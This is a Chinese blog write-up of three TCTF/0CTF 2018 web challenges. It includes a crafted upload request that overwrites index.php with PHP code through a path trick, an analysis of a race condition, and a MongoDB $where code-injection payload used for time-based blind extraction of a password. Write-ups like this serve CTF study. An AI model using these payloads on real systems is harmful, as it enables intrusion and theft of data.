

LoRexxar's Blog | 信息技术分享

LoRexxar's Blog | 信息技术分享

TCTF/0CTF2018 部分Web Writeup



TCTF/0CTF2018 部分Web Writeup

opcache nodejs race

 2018/04/05   Share

• 
• 
• 
• 
• 

ezdoor

题目上来就是代码审计，先看看代码

<?php

error_reporting(0);

$dir = 'sandbox/' . sha1($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
  mkdir($dir);
}
if(!file_exists($dir . "index.php")){
  touch($dir . "index.php");
}

function clear($dir)
{
  if(!is_dir($dir)){
    unlink($dir);
    return;
  }
  foreach (scandir($dir) as $file) {
    if (in_array($file, [".", ".."])) {
      continue;
    }
    unlink($dir . $file);
  }
  rmdir($dir);
}

switch ($_GET["action"] ?? "") {
  case 'pwd':
    echo $dir;
    break;
  case 'phpinfo':
    echo file_get_contents("phpinfo.txt");
    break;
  case 'reset':
    clear($dir);
    break;
  case 'time':
    echo time();
    break;
  case 'upload':
    if (!isset($_GET["name"]) || !isset($_FILES['file'])) {
      break;
    }

    if ($_FILES['file']['size'] > 100000) {
      clear($dir);
      break;
    }

    $name = $dir . $_GET["name"];
    if (preg_match("/[^a-zA-Z0-9.\/]/", $name) ||
      stristr(pathinfo($name)["extension"], "h")) {
      break;
    }
    move_uploaded_file($_FILES['file']['tmp_name'], $name);
    $size = 0;
    foreach (scandir($dir) as $file) {
      if (in_array($file, [".", ".."])) {
        continue;
      }
      $size += filesize($dir . $file);
    }
    if ($size > 100000) {
      clear($dir);
    }
    break;
  case 'shell':
    ini_set("open_basedir", "/var/www/html/$dir:/var/www/html/flag");
    include $dir . "index.php";
    break;
  default:
    highlight_file(__FILE__);
    break;
}

很简单的代码，差不多就是，你可以上传任意文件，但没有权限访问上传的文件。

所以思路很清楚，需要想办法覆盖index.php

很简单，用x/../index.php/.就可以绕过

构造请求

POST /?action=upload&name=x/../index.php/. HTTP/1.1
Host: 202.120.7.217:9527
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------18588164571683579890682678358
Content-Length: 420
Cookie: PHPSESSID=mu9mc6r8n7ccenpb94rrd1ibk5
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------18588164571683579890682678358
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: text/php

	

<?php echo 2333;?>

-----------------------------18588164571683579890682678358
Content-Disposition: form-data; name="submit"

Submit
-----------------------------18588164571683579890682678358--

接下来就是读一下/var/www/html/flag/里的文件，拿到文件93f4c28c0cf0b07dfd7012dca2cb868cc0228cad

从文件的结构来看是php的opcache文件

想到可以用很久以前提到过用来分析opcache webshell的工具

当时写过的翻译文

工具链接
https://github.com/GoSecure/php7-opcache-override

工具很久了，直接pull下来是跑不起来的，需要在py2.7下安2.8.3左右的construct库，然后工具就能用了。

但是中间很长时间的都会报错，到很晚才发现，在opcache的文件结构上，最开始是由OPCACHE\x00作为开始的，但获取回来不知道为什么没有这个\x00，修改文件之后成功获取到了php源代码的字节码。

 function encrypt() {
  #0 RECV(!0, None);
  #1 RECV(!0, None);
  #2 !0 = INIT_FCALL(!0, 'mt_srand');
  #3 !0 = SEND_VAL(1337, !0);
  #4 DO_ICALL(!0, !0);
  #5 ASSIGN(None, '');
  #6 STRLEN(None, !0);
  #7 ASSIGN(None, None);
  #8 STRLEN(None, !0);
  #9 ASSIGN(None, None);
  #10 ASSIGN(None, 0);
  #11 JMP(->-24, None);
  #12 !0 = INIT_FCALL(!0, 'chr');
  #13 !0 = INIT_FCALL(!0, 'ord');
  #14 FETCH_DIM_R(None, None);
  #15 !0 = SEND_VAR(None, !0);
  #16 DO_ICALL(!0, !0);
  #17 !0 = INIT_FCALL(!0, 'ord');
  #18 MOD(None, None);
  #19 FETCH_DIM_R(None, None);
  #20 !0 = SEND_VAR(None, !0);
  #21 DO_ICALL(!0, !0);
  #22 BW_XOR(None, None);
  #23 !0 = INIT_FCALL(!0, 'mt_rand');
  #24 !0 = SEND_VAL(0, !0);
  #25 !0 = SEND_VAL(255, !0);
  #26 DO_ICALL(!0, !0);
  #27 BW_XOR(None, None);
  #28 !0 = SEND_VAL(None, !0);
  #29 DO_ICALL(!0, !0);
  #30 ASSIGN_CONCAT(None, None);
  #31 PRE_INC(None, !0);
  #32 IS_SMALLER(None, None);
  #33 JMPNZ(None, ->134217662);
  #34 !0 = INIT_FCALL(None, 'encode');
  #35 !0 = SEND_VAR(None, !0);
  #36 DO_UCALL(!0, !0);
  #37 !0 = RETURN(None, !0);

}
function encode() {
  #0 RECV(!0, None);
  #1 ASSIGN(None, '');
  #2 ASSIGN(None, 0);
  #3 JMP(->-81, None);
  #4 !0 = INIT_FCALL(None, 'dechex');
  #5 !0 = INIT_FCALL(None, 'ord');
  #6 FETCH_DIM_R(None, None);
  #7 SEND_VAR(None, !0);
  #8 DO_ICALL(!0, !0);
  #9 SEND_VAR(None, !0);
  #10 DO_ICALL(!0, !0);
  #11 ASSIGN(None, None);
  #12 STRLEN(None, !0);
  #13 IS_EQUAL(None, 1);
  #14 JMPZ(None, ->-94);
  #15 CONCAT('0', None);
  #16 ASSIGN_CONCAT(None, None);
  #17 JMP(->-96, None);
  #18 ASSIGN_CONCAT(None, None);
  #19 PRE_INC(None, !0);
  #20 STRLEN(None, !0);
  #21 IS_SMALLER(None, None);
  #22 JMPNZ(None, ->134217612);
  #23 !0 = RETURN(None, !0);

}

#0 ASSIGN(None, 'input_your_flag_here');
#1 !0 = INIT_FCALL(None, 'encrypt');
#2 SEND_VAL('this_is_a_very_secret_key', !0);
#3 SEND_VAR(None, !0);
#4 DO_UCALL(!0, !0);
#5 IS_IDENTICAL(None, '85b954fc8380a466276e4a48249ddd4a199fc34e5b061464e4295fc5020c88bfd8545519ab');
#6 JMPZ(None, ->-136);
#7 !0 = ECHO('Congratulation! You got it!', !0);
#8 !0 = EXIT(!0, !0);
#9 !0 = ECHO('Wrong Answer', !0);
#10 !0 = EXIT(!0, !0);

根据php的一些文档，逐步分析字节码，猜测源码，其中最麻烦的坑可能就是变量不确定吧，中间的很多循环都有问题

http://php.net/manual/ro/internals2.opcodes.list.php

最终还原出来的代码近似于，其中encode函数猜测和python的encode('hex')相同

encrypt(pwn, data) {
    mt_srand(1337)
    $160 = strlen(pwn);
    $144 = strlen(data);
    $cipher = "";
    for ($176=0;$176<$160;$176++) {
        $cipher .= chr(ord(data[$176]) ^ ord(pwn[$176%144])^mt_rand(0,255))
    }
    return encode($cipher);
}

encrypt("flag", "this_is_a_very_secret_key") == "85b954fc8380a466276e4a48249ddd4a199fc34e5b061464e4295fc5020c88bfd8545519ab"

直接写python代码逆运算一下

secret = "this_is_a_very_secret_key"
result = "85b954fc8380a466276e4a48249ddd4a199fc34e5b061464e4295fc5020c88bfd8545519ab"
mt_rand = [151,189,92,232,167,217,167,90,114,82,84,72,9,134,182,90,23,152,129,27,93,6,22,114,194,105,104,203,65,60,215,147,238,81,111,91,179,57,195,148,8,72,61,71,122,91,137,196,223,225,76,134,196,244,114,245,174,247,20,18,26,195,105,162,170,196,251,8,78,230,131,88,93,136,47,71,132,227,18,189,9,241,92,77,50,76,176,45,179,184,242,161,173,0,49,73,84,255,45,226]

j=0
s = ""

for i in result.decode('hex'):
	s+=chr(ord(i)^mt_rand[j]^ord(secret[j%len(secret)]))
	j+=1

print s

这里有个很需要注意的点就是，这里的mt_rand需要php7.2.x以上生成的数据，不然随机数生成结果不同。

easy ums

这题真的是很坑很坑的题目，比赛时遇到一直猜测是和dns或者请求库有关的漏洞，结果没想到是一个比较简单的条件竞争。

附上一片别人的Writeup

https://coxxs.me/676

题目条件特别少，大意就是，注册时的手机号填ip，验证码会通过想ip的80端口发送请求来发送验证码。

大致就是这样

202.120.7.196 - - [04/Apr/2018:23:48:46 +0800] "HEAD /?86beaba44806e4ed007aecef7ed1ab15 HTTP/1.1" 200 0 "-" "-" -

用这个验证码可以验证ip，你就可以把自己用户的ip修改为指定的，当你可以修改为8.8.8.8时，你就可以得到flag。

登陆成功后只有一个修改手机号的功能。

假设我们试图修改自己的验证ip时

我们可以发送这次post请求延时非常大，与我们平时代码书写习惯不同，这里应该是涉及到了对数据库的操作。

这时候假设我们用另一个浏览器登录的话，可以发现index.php页面没有收到任何改变，但如果我们在前一个浏览器的verify.php继续执行的话，仍然可以修改，那么我们可以猜测后台数据库的结构大致为

userid
new_ip
is_verify

在我们发起请求的时候，这里对数据库进行了插入新数据，而index.php页面则是获取了类似于(userid, is_verify)双限制的数据库结果。

如果后台是类似于这样的结构时，假设我们在发起修改为8.8.8.8的请求时，使用已经获取的旧的token码更新验证，就有可能将8.8.8.8更新为我们的ip。

需要注意的一点就是，这里对单独的seesion请求，请求是单线程处理的，也就是不存在竞争，这里必须用不同session竞争才能成功。

tctf{session_database_keep_updated}

login me

这个题在我看来其实是一个挺矛盾的题目，有意思的是它的利用点和方式很有趣，但又有很多无趣的点。

代码如下

var express = require('express')
var app = express()

var bodyParser = require('body-parser')
app.use(bodyParser.urlencoded({}));

var path    = require("path");
var moment = require('moment');
var MongoClient = require('mongodb').MongoClient;
var url = "mongodb://localhost:27017/";

MongoClient.connect(url, function(err, db) {
    if (err) throw err;
    dbo = db.db("test_db");
    var collection_name = "users";
    var password_column = "password_"+Math.random().toString(36).slice(2)
    var password = "XXXXXXXXXXXXXXXXXXXXXX";
    // flag is flag{password}
    var myobj = { "username": "admin", "last_access": moment().format('YYYY-MM-DD HH:mm:ss Z')};
    myobj[password_column] = password;
    dbo.collection(collection_name).remove({});
    dbo.collection(collection_name).update(
        { name: myobj.name },
        myobj,
        { upsert: true }
    );

    app.get('/', function (req, res) {
        res.sendFile(path.join(__dirname,'index.html'));
    })
    app.post('/check', function (req, res) {
        var check_function = 'if(this.username == #username# && #username# == "admin" && hex_md5(#password#) == this.'+password_column+'){\nreturn 1;\n}else{\nreturn 0;}';

        for(var k in req.body){
            var valid = ['#','(',')'].every((x)=>{return req.body[k].indexOf(x) == -1});
            if(!valid) res.send('Nope');
            check_function = check_function.replace(
                new RegExp('#'+k+'#','gm')
                ,JSON.stringify(req.body[k]))
        }
        var query = {"$where" : check_function};
        var newvalue = {$set : {last_access: moment().format('YYYY-MM-DD HH:mm:ss Z')}}
        dbo.collection(collection_name).updateOne(query,newvalue,function (e,r){
            if(e) throw e;
            res.send('ok');
            // ... implementing, plz dont release this.
        });
    })
    app.listen(8081)

});

很容易就能看出来核心代码，就是后面一部分

初看到这个题目其实很容易歪楼，很容易把问题想到mongdb注入上，实际上题目是一个代码注入。

因为req.body是我们发送的请求，那么我们就可以控制正则表达式来替换内容，通过合理的正则，我们可以替换为对this.password的操作，然后通过js代码执行来获取数据。

这是我们的最终payload

|#|=&|this.*"\)|=&|==|[]=%7C%7Ceval(&%7C%22%22+%5C%5B%22%7C=a&%7Ca%22%7C=%2B&%7C%22%2B%7C=&%7C%22%22%5C%5D%2b%7C=aaaa&%7Caaaa%22%7C=%2B&%7C%5C)%7B%7C%5B%5D=bbb).match(/^13fc892df79a86494792e14dcbef252a'+i+'.*/)){sleep(1000);}else{return%20&|\["|=&|""b|=%2b&|"bb|=&|return(\s.*)*0|=11111

通过修改这里的match来匹配密码，如果为真则sleep，通过这样的方式，我们成功把代码注入改成了一个盲注，后面就很简单了。

原文作者：LoRexxar

原文链接：https://lorexxar.cn/2018/04/05/0ctf2018-other/

发表日期：April 5th 2018, 1:10:50 am

更新日期：September 29th 2020, 2:11:23 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  TCTF/0CTF2018 h4xors.club2 Writeup
• Previous Post
  TCTF/0CTF2018 XSS bl0g Writeup

Powered by Hexotheme Archer

京ICP备2021004652号-1

PV: :)

CATALOG

1. 1. ezdoor
2. 2. easy ums
3. 3. login me

• Archive
• Tag
• Cate

Total : 206

2024

• 06/11 PHP CGI Windows平台远程代码执行漏洞（CVE-2024-4577）分析与复现

2023

• 12/18 人与代码的桥梁-聊聊SAST
• 11/21 Joern In RealWorld (3) - 致远OA A8 SSRF2RCE
• 10/26 Joern In RealWorld (2) - Jumpserver随机数种子泄露导致账户劫持漏洞（CVE-2023-42820）
• 10/20 深入浅出Joern（四）不常用语法大全
• 08/31 Joern In RealWorld (1) - Acutators + CVE-2022-21724
• 08/24 深入浅出Joern（三）Joern和Neo4j常用语法大全
• 08/22 深入浅出Joern（二）CPG与图数据库
• 08/21 深入浅出Joern（一）Joern与CPG是什么？
• 07/19 打造自己的AIGC应用（一）入门篇
• 06/21 赛博偶像速成指南（三）- Midjourney
• 06/02 赛博偶像速成指南（二）- SD进阶篇
• 05/25 从0到1的ChatGPT - 进阶篇（五）- Embeddings
• 05/19 从0到1的ChatGPT - 进阶篇（四）- 训练自己的ChatGPT
• 05/08 看上去不起眼的微信机器人以及公众号爬虫
• 04/28 从0到1的ChatGPT - 进阶篇（三）- ChatGPT+？
• 04/26 从0到1的ChatGPT - 入门篇（二） - 如何与ChatGPT对话？
• 04/14 从0到1的ChatGPT - 入门篇
• 02/21 赛博偶像速成指南

2022

• 11/02 CS Xss2Rce CVE-2022-39197分析与复现
• 04/14 SCA的困境和出路
• 03/21 人生的第二个可能~

2021

• 12/10 log4j2 JNDI注入漏洞速通~
• 08/17 从0开始入门Chrome Ext安全（三） -- 你所未知的角落 - Chrome Ext安全
• 08/17 DevSecOps 究竟需要怎样的白盒？
• 08/06 区块链安全罪与罚 -- 浅谈区块链与安全发展史
• 05/19 创宇四年
• 04/16 反制Webdriver - 从Bot到RCE进发
• 03/09 通达OA代码审计篇二 - 11.8 后台Getshell
• 03/03 通达OA代码审计篇 - 11.7 有条件的任意命令执行
• 02/05 如何自动化挖掘php反序列化链 - phpunserializechain诞生记
• 01/28 为被动扫描器量身打造一款爬虫-LSpider

2020

• 10/30 构造一个CodeDB来探索全新的白盒静态扫描方案
• 09/21 从0开始聊聊自动化静态代码审计工具
• 07/14 Geekpwn 2020云端挑战赛 Noxss & umsg
• 07/08 从反序列化到类型混淆漏洞 -- 记一次ecshop实例利用
• 06/10 Roundcube mail 3 Xss
• 05/29 Roundcube mail代码审计笔记
• 05/11 空指针-Base on windows Writeup -- 最新版DZ3.4实战渗透
• 02/03 从0开始入门Chrome Ext安全（番外篇） -- Zoomeye Tools
• 01/14 CSS-T | Mysql Client 任意文件读取攻击链拓展

2019

• 12/30 pwnhub 被污染的Jade
• 12/05 从0开始入门Chrome Ext安全（二） -- 安全的Chrome Ext
• 11/22 从0开始入门Chrome Ext安全（一） -- 了解一个Chrome Ext
• 10/25 PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
• 09/23 从零开始学java web - struts2 RCE分析
• 07/23 CVE-2019-11229详细分析 --git config可控-RCE
• 07/10 Redis 基于主从复制的RCE利用方式
• 06/12 Mybb 18.20 From Stored XSS to RCE 分析
• 05/28 MIMIC Defense CTF 2019 final writeup
• 04/19 Drupal 1-click to RCE分析
• 03/14 聊聊WordPress 5.1.1 CSRF to RCE漏洞
• 02/22 Wordpress 5.0 RCE详细分析

2018

• 12/07 Discuz x3.4前台SSRF分析
• 12/07 Code Breaking挑战赛 Writeup
• 12/01 以太坊智能合约审计CheckList
• 11/20 LCTF2018 ggbank 薅羊毛实战
• 11/16 从DVP GAME到变量覆盖问题
• 11/14 HCTF2018部分Web题目Writeup
• 11/12 HCTF2018智能合约两则Writeup
• 11/08 “以太坊智能合约编码隐患”影响分析报告
• 10/18 智能合约游戏之殇——Dice2win安全分析
• 09/25 “以太坊智能合约编码设计问题”影响分析报告
• 09/14 blockwell.ai 虚假转账 事件分析
• 09/06 “以太坊智能合约编码安全问题”影响分析报告
• 08/24 智能合约游戏之殇-类Fomo3D攻击分析
• 08/22 “以太坊智能合约设计缺陷问题”影响分析报告
• 08/14 “以太坊智能合约规范问题”影响分析报告
• 07/13 wctf2018 cyber mimic defence Writeup
• 05/31 0CTF/TCTF2018 Final Web Writeup
• 05/23 RCTF2018 Web Writeup
• 04/20 基于Service Worker 的XSS攻击面拓展
• 04/17 TCTF/0CTF2018 h4x0rs.space Writeup
• 04/10 TCTF/0CTF2018 h4xors.club2 Writeup
• 04/05 TCTF/0CTF2018 部分Web Writeup
• 04/05 TCTF/0CTF2018 XSS bl0g Writeup
• 03/26 强网杯2018 Web writeup
• 02/23 吐槽HCTF2017
• 02/07 从补丁到漏洞分析 --记一次joomla漏洞应急
• 01/19 DeDeCMS v5.7 密码修改漏洞分析
• 01/02 34c3 Web部分Writeup

2017

• 12/19 WordPress Updraftplus 插件漏洞2则以及一些有趣的故事
• 11/15 HCTF2017-Deserted place-Writeup
• 11/15 HCTF2017 babycrack Writeup
• 11/15 HCTF2017-A World Restored-Writeup
• 11/10 HITCON2017-writeup整理
• 10/26 typecho前台getshell漏洞分析
• 10/25 前端防御从入门到弃坑--CSP变迁
• 10/25 WordPress安全架构分析
• 09/30 Discuz!X 3.4 任意文件删除漏洞分析
• 08/31 阿里先知xss挑战赛 Writeup
• 08/31 Discuz_X authkey安全性漏洞分析
• 08/23 从瑞士军刀到变形金刚--XSS攻击面拓展
• 08/15 pwnhub 改行做前端
• 07/26 finecms分析
• 07/23 xssgame writeup
• 07/20 FineCMS multi vulnerablity before v5.0.9
• 07/11 Some Vulnerability for FineCMS through 2017.7.11
• 07/11 第十届信息安全国赛 Web MISC writeup
• 07/07 WordPress WP Statistics authenticated xss Vulnerability(WP Statistics <=12.0.9)
• 06/16 0ctf2017 final
• 05/23 RCTF2017 web writeup
• 05/16 通过浏览器缓存来bypass CSP script nonce
• 05/12 PlaidCTF 2017 web writeup
• 05/12 xss bot从入门到弃坑
• 05/09 CSP Is Dead, Long Live CSP! 翻译
• 04/24 pwnhub 绝对防御 出题思路和反思
• 04/21 Shadow Brokers大新闻整理
• 04/21 360春秋杯2017 writeup
• 04/18 bctf2017 web部分wp
• 03/27 pwnhub 之小m的复仇
• 03/21 0ctf201 web部分writeup
• 03/13 NJCTF Web部分writeup
• 03/05 pwnhub_another php web部分
• 02/27 zctf2017 writeup
• 02/20 pwnhub 打开电脑
• 02/16 有趣的cdn bypass CSP
• 01/26 聊聊hctf2016
• 01/17 pwnhub 深入敌后
• 01/03 33c32016 writeup

2016

• 12/28 phpmailer RCE漏洞分析
• 12/26 pwnhub_迷
• 12/24 浅谈xss的后台守护问题
• 12/18 pwnhub_找朋友
• 12/18 pwnhub_拍卖行
• 12/10 pwnhub_WTF_writeup
• 12/07 using polyglot JPEGs bypass CSP 分析
• 12/03 通过redis getshell的一些小问题
• 12/01 hctf2016 简单部分WEB && misc writeup
• 11/30 hctf2016 guestbook&secret area writeup
• 11/29 HCTF2016 ATField writeup
• 11/19 hctf2016 giligili writeup
• 10/31 CSP进阶-302 Bypass CSP
• 10/28 CSP进阶-link Bypass unsafe line
• 10/26 什么是ctf呢？
• 10/11 hitcon2016 misc writeup
• 10/10 hitcon2016 web writeup
• 10/03 L-ctf2016 Writeup
• 09/14 php 伪协议
• 09/11 华山杯2016_writeup
• 08/29 crypto 简单的RSA
• 08/18 sqlmap 源码分析（四）开始注入
• 08/16 sqlmap 源码分析（三）在注入之前
• 08/11 sqlmap 源码分析（二）初始化
• 08/09 sqlmap 源码分析（一）开始、参数解析
• 08/08 CSP Level 3浅析&简单的bypass
• 08/07 python virtualenv沙盒命令
• 08/01 XNUCA2016 Writeup
• 07/21 python tqdm模块分析
• 07/18 shell上一些有趣的命令
• 07/17 sangebaimao之火币网
• 07/12 信息安全国赛技能赛 Writeup
• 06/26 一个有趣的东西-cloudeye
• 06/17 sangebaimao之招聘又开始了，你怕了吗？
• 06/06 alictf2016_web_writeup
• 06/04 sangebaimao 寻找来自星星的你一
• 05/27 在php opcache检测隐藏的后门程序
• 05/12 php webshell 各种函数
• 05/10 Asis2016_Binary Cloud
• 05/09 sctf2016_writeup
• 05/05 dockerfile (・ω・)ノ
• 05/04 docker 基础操作
• 05/02 google_ctf2016_writeup
• 04/25 CCTF2016_writeup
• 04/20 gif bypass CSP?
• 04/11 j123jt的聊天板大型wp
• 04/11 sctfq1_Obfusion_writeup
• 04/08 input属性bypass csp
• 04/06 hctfgame_ll的流量分析题
• 04/04 is_numeric和trim导致的判断绕过
• 03/30 web_for_pentest_II writeup
• 03/22 bctf2016
• 03/14 hctf_game_week4+5_writeup
• 03/14 0ctf2016 && sunshinectf2016 writeup
• 03/07 bkp2016_writeup
• 03/05 hexo转移到coding配置
• 03/01 ssctf2015_writeup
• 02/29 hctf_game_week3_writeup
• 02/28 ldpa简单注入
• 02/28 titan souls 普通模式通关攻略
• 02/18 简单的git教程
• 02/18 hctf_game_week2_writeup
• 02/18 hctf_game_week1_writeup
• 02/18 hctf_game_week0_writeup

2015

• 12/21 《代码审计》一点儿笔记
• 12/19 hctf2015的一点儿记录
• 11/19 xss link&svg黑魔法
• 11/19 SQL 显错注入
• 11/17 ISG2015_writeup
• 11/17 RCTF2015_writeup
• 11/02 SPWC & 华山杯？ writeup
• 10/24 关于sqli注入的特殊函数
• 10/04 XDCTF2015-writeup
• 09/28 Nsctf2015_Writeup
• 07/02 xss无声挑战赛_writeup
• 06/11 ctf近期总结
• 05/22 Windows Hexo博客安装配置优化（小白篇）
• 05/21 Hduisa_ctf_wee4_fucksql
• 05/10 Web for pentester_writeup
• 02/26 Hduisa_ctf_writeup01
• 02/26 Hduisa_ctf_writeup02
• 02/26 （转）十年学会程序设计
• 01/22 0基础如何学好WEB（转）

2014

• 12/31 凤凰挽歌，黑客独白（作者：我是老鹰&炫凤舞）
• 12/29 （转）学长们给我们的书目（结尾附上PDF地址）
• 12/29 菜鸟小白的开始...

 ctf  Blogs  sqli  CSP  xss  postMessage  java  csp  ssrf  redis  opcache  nodejs  race  pdflatex  csrf  Hexo  cve  Shadow Brokers  0day  windows  aigc  php  c  curl  eth  blockchain  Reprint  bookshelf  chatgpt  llm  embeddings  chrome_ext  chrome  chrome ext  webdriver  dns  cloudeye  crypto  RSA  rabins  cmd  shell  linux  node  cs  CVE-2022-39197  contract  mysql  dedecms  逻辑漏洞  phpmailer  midjourney  智能合约  aicg  sd  devsecops  whitebox  book_notes  docker  ctf web  phar  rce  dvp  漏洞分析  git  反序列化漏洞  类型混淆漏洞  ecshop  dz  Fomo3D  access  伪协议  Essay  hctf  misc  php opcache  eassy  checklist  jsre  clrf  struts2  sast  joern  cpg  oa  neo4j  白盒  injection  随笔  django  LSpider  爬虫  mimic  log4j2  jndi  pwnhub  flask  格式化字符串  模板注入  js  weblogic  lfi  wget  pwn  LFI  win server信息收集  msf  lcx端口转发  IPC通道入侵  fastcgi  ssh_sock5  python  tqdm  virtualenv  open_basedir  crontab  sangebaimao  php伪协议  file_put_contents  参数污染  CBC  LD_PRELOAD  sca  roundcube  gopher  fcgi  Essry  sqlmap  game  titan_souls  tongda  blog  wechat  SAST  tools  静态分析  wordpress  代码审计  条件竞争



缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98

 Blogs  Reprint

